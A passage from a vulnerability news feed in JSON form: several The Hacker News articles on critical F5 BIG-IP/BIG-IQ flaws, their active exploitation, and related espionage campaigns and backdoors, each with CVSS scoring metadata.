scans](<https://twitter.com/bad_packets/status/1372650076024107009>) are said to have spiked since March 18.\n\nThe flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical remote code execution (CVE-2021-22986) also impacting BIG-IQ versions 6.x and 7.x. [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) (CVSS score: 9.8) is notable for the fact that it's an unauthenticated, remote command execution vulnerability affecting the iControl REST interface, allowing an attacker to execute arbitrary system commands, create or delete files, and disable services without the need for any authentication.\n\nSuccessful exploitation of these vulnerabilities could lead to a full compromise of susceptible systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a denial of service (DoS) attack.\n\n[![](https://thehackernews.com/images/-pOsO0M730cQ/YFYcww7f-PI/AAAAAAAA3s0/S9EnJJEwsiUZnY7kt2AC-WtKguHTDCbXwCLcBGAsYHQ/s0/hacking-code.jpg)](<https://thehackernews.com/images/-pOsO0M730cQ/YFYcww7f-PI/AAAAAAAA3s0/S9EnJJEwsiUZnY7kt2AC-WtKguHTDCbXwCLcBGAsYHQ/s0/hacking-code.jpg>)\n\nWhile F5 said it wasn't aware of any public exploitation of these issues on March 10, researchers from NCC Group [said](<https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/>) they have now found evidence of \"full chain exploitation of F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986\" in the wake of multiple exploitation attempts against its honeypot infrastructure.\n\nAdditionally, Palo Alto Networks' Unit 42 threat intelligence team [said](<https://twitter.com/Unit42_Intel/status/1373017186818781190>) it found attempts to exploit CVE-2021-22986 to install a variant of the Mirai botnet. But it's not immediately clear if those attacks were successful.\n\nGiven the popularity of BIG-IP/BIG-IQ in corporate and government networks, it should come as no surprise that this is the second time in a year F5 appliances have become a lucrative target for exploitation. \n\nLast July, the company addressed a similar critical flaw ([CVE-2020-5902](<https://thehackernews.com/2020/07/f5-big-ip-application-security.html>)), following which it was abused by Iranian and Chinese state-sponsored hacking groups, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a \"broad scanning activity for the presence of this vulnerability across federal departments and agencies.\"\n\n\"The bottom line is that [the flaws] affect all BIG-IP and BIG-IQ customers and instances \u2014 we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible,\" F5 Senior Vice President Kara Sprague [noted](<https://www.f5.com/company/blog/big-ip-and-big-iq-vulnerabilities-protecting-your-organization>) last week.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-20T15:54:00", "type": "thn", "title": "Critical F5 BIG-IP Bug Under Active Attacks After PoC Exploit Posted Online", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2021-22986"], "modified": "2021-03-22T14:27:48", "id": "THN:4959B86491B72239BCAF1958D167D57D", "href": "https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[![](https://thehackernews.com/images/-6eC4FwSH2yw/YEmwuyqxcNI/AAAAAAAACAY/aWrRRdD8cBg6xoe5Pf5tW9tF8Rh1YaijwCLcBGAsYHQ/s0/f5-big-ip-hacking.jpg)](<https://thehackernews.com/images/-6eC4FwSH2yw/YEmwuyqxcNI/AAAAAAAACAY/aWrRRdD8cBg6xoe5Pf5tW9tF8Rh1YaijwCLcBGAsYHQ/s0/f5-big-ip-hacking.jpg>)\n\nApplication security company F5 Networks on Wednesday published an [advisory](<https://support.f5.com/csp/article/K02566623>) warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks.\n\nThe patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), [two](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2126>) of [which](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2132>) were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020.\n\nThe four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues.\n\nSuccessful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a DoS attack.\n\nUrging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague [said](<https://www.f5.com/company/blog/big-ip-and-big-iq-vulnerabilities-protecting-your-organization>) the \"vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program.\"\n\n[![](https://thehackernews.com/images/-VxN1SzbZz9k/YEmul9_bMdI/AAAAAAAACAQ/zxGSMU-no54Ri18zqGtIANW32scBRojhwCLcBGAsYHQ/s0/f5.jpg)](<https://thehackernews.com/images/-VxN1SzbZz9k/YEmul9_bMdI/AAAAAAAACAQ/zxGSMU-no54Ri18zqGtIANW32scBRojhwCLcBGAsYHQ/s0/f5.jpg>)\n\nThe vulnerabilities have been addressed in the following products:\n\n * BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3\n * BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2\n\nBesides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues.\n\nThe fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution. \n\nThe latest update to BIG-IP software arrives less than a year after the company addressed a [similar critical flaw](<https://support.f5.com/csp/article/K52145254>) ([CVE-2020-5902](<https://thehackernews.com/2020/07/f5-big-ip-application-security.html>)) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an [alert](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) cautioning of a \"broad scanning activity for the presence of this vulnerability across federal departments and agencies.\"\n\n\"This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices,\" [said](<https://twitter.com/pwnallthethings/status/1369682528982999048>) Matt \"Pwn all the Things\" Tait in a tweet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T05:56:00", "type": "thn", "title": "Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform \u2014 Patch ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2021-22986", "CVE-2021-22992"], "modified": "2021-03-11T06:01:14", "id": "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "href": "https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:58", "description": "[![Cyber Espionage Group](https://thehackernews.com/images/-Dtzc9yz6RbM/YMMKHm4Kx-I/AAAAAAAAC1I/WYDMtfEjbWsxxIw0vYe_MVWM-NM6RyBbwCLcBGAsYHQ/s728-e1000/ukraine-russia-hacking.png)](<https://thehackernews.com/images/-Dtzc9yz6RbM/YMMKHm4Kx-I/AAAAAAAAC1I/WYDMtfEjbWsxxIw0vYe_MVWM-NM6RyBbwCLcBGAsYHQ/s0/ukraine-russia-hacking.png>)\n\nCybersecurity researchers on Thursday took the wraps off a new cyber espionage group that has been behind a series of targeted attacks against diplomatic entities and telecommunication companies in Africa and the Middle East since at least 2017.\n\nDubbed \"[BackdoorDiplomacy](<https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/>),\" the campaign involves targeting weak points in internet-exposed devices such as web servers to perform a panoply of cyber hacking activities, including laterally moving across the network to deploy a custom implant called Turian that's capable of exfiltrating sensitive data stored in removable media.\n\n\"BackdoorDiplomacy shares tactics, techniques, and procedures with other Asia-based groups. Turian likely represents a next stage evolution of [Quarian](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal>), the backdoor last observed in use in 2013 against diplomatic targets in Syria and the U.S,\" said Jean-Ian Boutin, head of threat research at Slovak cybersecurity firm ESET.\n\n[![](https://thehackernews.com/images/-GIau-4HiGNY/YML9xAgaoII/AAAAAAAAC04/eXu31e-sG6c5n_ctCdy5Ywqze7jQrNwPQCLcBGAsYHQ/s0/malware-code.jpg)](<https://thehackernews.com/images/-GIau-4HiGNY/YML9xAgaoII/AAAAAAAAC04/eXu31e-sG6c5n_ctCdy5Ywqze7jQrNwPQCLcBGAsYHQ/s0/malware-code.jpg>)\n\nEngineered to target both Windows and Linux operating systems, the cross-platform group singles out management interfaces for networking equipment and servers with internet-exposed ports, likely exploiting unpatched vulnerabilities to deploy the China Chopper web shell for initial access, using it to conduct reconnaissance and install the backdoor.\n\n[![](https://thehackernews.com/images/-1FpXL2Tz5Cw/YML-Kbavm8I/AAAAAAAAC1A/FhSXMvLarUswpSjlt04uYWaNTB0uFRHbgCLcBGAsYHQ/s0/malware-encryption.jpg)](<https://thehackernews.com/images/-1FpXL2Tz5Cw/YML-Kbavm8I/AAAAAAAAC1A/FhSXMvLarUswpSjlt04uYWaNTB0uFRHbgCLcBGAsYHQ/s0/malware-encryption.jpg>)\n\nTargeted systems include F5 BIG-IP devices (CVE-2020-5902), Microsoft Exchange servers, and Plesk web hosting control panels. Victims have been identified in the Ministries of Foreign Affairs of multiple African countries, as well as in Europe, the Middle East, and Asia. Additionally, telecom providers in Africa and at least one Middle Eastern charity have also been hit.\n\n\"In each case, operators employed similar tactics, techniques, and procedures (TTPs), but modified the tools used, even within close geographic regions, likely to make tracking the group more difficult,\" the researchers said. BackdoorDiplomacy is also believed to overlap with previously reported campaigns operated by a Chinese-speaking group Kaspersky tracks as \"[CloudComputating](<https://securelist.com/apt-trends-report-q2-2020/97937/>).\"\n\nBesides its features to gather system information, take screenshots, and carry out file operations, ESET researchers said Turian's network encryption protocol is nearly identical to that employed by [WhiteBird](<https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird>), a C++ backdoor operated by an Asia-based threat actor named Calypso, that was installed within diplomatic organizations in Kazakhstan and Kyrgyzstan, and during the same timeframe as BackdoorDiplomacy.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T07:01:00", "type": "thn", "title": "New Cyber Espionage Group Targeting Ministries of Foreign Affairs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-06-14T06:04:35", "id": "THN:BCC351AC0BA61400C97A7E529C22A518", "href": "https://thehackernews.com/2021/06/new-cyber-espionage-group-targeting.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T03:59:04", "description": "[![Ukrainian Software Company](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiksM7slN_dJ5WFWyeZAhQxY-5ycGRUBwDOewiWPSI1Fe7vaIJErbZi5xc9ZFpBT3M5PfKMZQjfqkphQFD19YK7LLjTk8vuvPrF3AFRDRPELT7sD0tgujtXb-Ws8fkbtwYjvT0Ga_KfpkH0BR3QueoSWrGrLhxqIsGXMY5LA5Ao_X8BGnQ2qjudnjZm/s728-e1000/software-developmnet.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiksM7slN_dJ5WFWyeZAhQxY-5ycGRUBwDOewiWPSI1Fe7vaIJErbZi5xc9ZFpBT3M5PfKMZQjfqkphQFD19YK7LLjTk8vuvPrF3AFRDRPELT7sD0tgujtXb-Ws8fkbtwYjvT0Ga_KfpkH0BR3QueoSWrGrLhxqIsGXMY5LA5Ao_X8BGnQ2qjudnjZm/s728-e100/software-developmnet.jpg>)\n\nA large software development company whose software is used by different state entities in Ukraine was at the receiving end of an \"uncommon\" piece of malware, new research has found.\n\nThe malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as [GoMet](<https://github.com/Laeeth/GoMet>) and is designed for maintaining persistent access to the network.\n\n\"This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise,\" Cisco Talos [said](<https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html>) in a report shared with The Hacker News.\n\nAlthough there are no concrete indicators linking the attack to a single actor or group, the cybersecurity firm's assessment points to Russian nation-state activity.\n\nPublic reporting into the use of GoMet in real-world attacks has so far uncovered only two documented cases to date: one in 2020, coinciding with the disclosure of [CVE-2020-5902](<https://thehackernews.com/2020/07/f5-big-ip-application-security.html>), a critical remote code execution flaw in F5's BIG-IP networking devices.\n\nThe second instance entailed the successful exploitation of [CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>), a remote code execution vulnerability in Sophos Firewall, by an unnamed advanced persistent threat (APT) group earlier this year.\n\n\"We haven't seen GoMet deployed across the other organizations we've been working closely with and monitoring so that implies it is targeted in some manner but could be in use against additional targets we don't have visibility into,\" Nick Biasini, head of outreach for Cisco Talos, told The Hacker News.\n\n\"We have also conducted relatively rigorous historic analysis and see very little use of GoMet historically which further indicates that it is being used in very targeted ways.\"\n\nGoMet, as the name implies, is written in Go and comes with features that allow the attacker to remotely commandeer the compromised system, including uploading and downloading files, running arbitrary commands, and using the initial foothold to propagate to other networks and systems via what's called a [daisy chain](<https://www.tenable.com/blog/daisy-chaining-how-vulnerabilities-can-be-greater-than-the-sum-of-their-parts>).\n\nAnother notable feature of the implant is its ability to run scheduled jobs using [cron](<https://en.wikipedia.org/wiki/Cron>). While the original code is configured to execute cron jobs once every hour, the modified version of the backdoor used in the attack is built to run every two seconds and ascertain if the malware is connected to a command-and-control server.\n\n\"The majority of the attacks we've been seeing lately are related to access, either directly or through credential acquisition,\" Biasini said. \"This is another example of that with GoMet being deployed as a backdoor.\"\n\n\"Once the access has been established, additional reconnaissance and more thorough operations can follow. We're working to kill the attacks before they get to this stage so it's difficult to predict the types of follow-on attacks.\"\n\nThe findings come as the U.S. Cyber Command on Wednesday [shared](<https://twitter.com/CNMF_CyberAlert/status/1549764857972621322>) the indicators of compromise (IoCs) pertaining to different types of malware such as [GrimPlant, GraphSteel](<https://thehackernews.com/2022/04/ukraine-warns-of-cyber-attack-aiming-to.html>), Cobalt Strike Beacon, and [MicroBackdoor](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) targeting Ukrainian networks in recent months.\n\nCybersecurity firm Mandiant has since [attributed](<https://www.mandiant.com/resources/spear-phish-ukrainian-entities>) the phishing attacks to two espionage actors tracked as [UNC1151](<https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html>) (aka Ghostwriter) and UNC2589, the latter of which is suspected to \"act in support of Russian government interest and has been conducting extensive espionage collection in Ukraine.\"\n\nThe uncategorized threat cluster UNC2589 is also believed to be behind the [WhisperGate](<https://thehackernews.com/2022/01/a-new-destructive-malware-targeting.html>) (aka PAYWIPE) data wiper attacks in mid-January 2022. Microsoft, which is tracking the same group under the name [DEV-0586](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>), has assessed it to be affiliated to Russia's [GRU military intelligence](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-21T12:02:00", "type": "thn", "title": "Hackers Target Ukrainian Software Company Using GoMet Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2022-1040"], "modified": "2022-07-22T03:26:54", "id": "THN:6D6F52F8E55C98F540525853C434FD08", "href": "https://thehackernews.com/2022/07/hackers-target-ukrainian-software.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:16", "description": "[![f5 big-ip application security manager](https://thehackernews.com/images/-ESCkWH_hGFA/XwCORuHyklI/AAAAAAAA2_Y/8xaEkL1aRAsnYdpCaEIFxLgvuBwf2BtkQCLcBGAsYHQ/s728-e100/f5-big-ip-application-security.jpg)](<https://thehackernews.com/images/-ESCkWH_hGFA/XwCORuHyklI/AAAAAAAA2_Y/8xaEkL1aRAsnYdpCaEIFxLgvuBwf2BtkQCLcBGAsYHQ/s728-e100/f5-big-ip-application-security.jpg>)\n\n \nCybersecurity researchers today issued a security advisory warning enterprises and governments across the globe to immediately patch a highly-critical remote code execution vulnerability affecting F5's BIG-IP networking devices running application security servers. \n \nThe vulnerability, assigned [CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) and rated as critical with a CVSS score of 10 out of 10, could let remote attackers take complete control of the targeted systems, eventually gaining surveillance over the application data they manage. \n \nAccording to Mikhail Klyuchnikov, a security researcher at Positive Technologies who discovered the flaw and reported it to F5 Networks, the issue resides in a configuration utility called Traffic Management User Interface (TMUI) for BIG-IP application delivery controller (ADC). \n \nBIG-IP ADC is being used by large enterprises, data centers, and cloud computing environments, allowing them to implement application acceleration, load balancing, rate shaping, SSL offloading, and web application firewall. \n \n\n\n## F5 BIG-IP ADC RCE Flaw (CVE-2020-5902)\n\n \nAn unauthenticated attacker can remotely exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration. \n \nSuccessful exploitation of this vulnerability could allow attackers to gain full admin control over the device, eventually making them do any task they want on the compromised device without any authorization. \n \n\n\n[![f5 big-ip application security manager](https://thehackernews.com/images/-mSgD9hYm9iE/XwCPk5rodoI/AAAAAAAA2_k/Jk-64lba4o0OYBTI-vkgZlYW_MAMyckeQCLcBGAsYHQ/s728-e100/f5-big-ip-application.jpg)](<https://thehackernews.com/images/-mSgD9hYm9iE/XwCPk5rodoI/AAAAAAAA2_k/Jk-64lba4o0OYBTI-vkgZlYW_MAMyckeQCLcBGAsYHQ/s728-e100/f5-big-ip-application.jpg>)\n\n \n\"The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,\" [Klyuchnikov said](<https://swarm.ptsecurity.com/rce-in-f5-big-ip/>). \n \n\"RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation.\" \n \nAs of June 2020, more than 8,000 devices have been identified online as being exposed directly to the internet, of which 40% reside in the United States, 16% in China, 3% in Taiwan, 2.5% in Canada and Indonesia and less than 1% in Russia, the security firm says. \n \nHowever, Klyuchnikov also says that most companies using the affected product do not enable access to the internet's vulnerable configuration interface. \n \n\n\n## F5 BIG-IP ADC XSS Flaw (CVE-2020-5903)\n\n \nBesides this, Klyuchnikov also reported an XSS vulnerability (assigned [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>) with a CVSS score of 7.5) in the BIG-IP configuration interface that could let remote attackers run malicious JavaScript code as the logged-in administrator user. \n \n\"If the user has administrator privileges and access to Advanced Shell (bash), successful exploitation can lead to a full compromise of BIG-IP via RCE,\" the researcher said. \n \n\n\n## Affected Versions and Patch Updates\n\n \nAffected companies and administrators relying on vulnerable BIG-IP versions 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x are strongly recommended to update their devices to the latest versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4 as soon as possible. \n \nMoreover, users of public cloud marketplaces like AWS (Amazon Web Services), Azure, GCP, and Alibaba are also advised to switch to BIG-IP Virtual Edition (VE) versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.0.1.4, or 15.1.0.4, as soon as they are available. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-04T14:20:00", "type": "thn", "title": "Critical RCE Flaw Affects F5 BIG-IP Application Security Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-15T18:43:21", "id": "THN:02088F21DB6E2D58FA2FBFDB5C735108", "href": "https://thehackernews.com/2020/07/f5-big-ip-application-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[![Chinese Hackers](https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg)](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 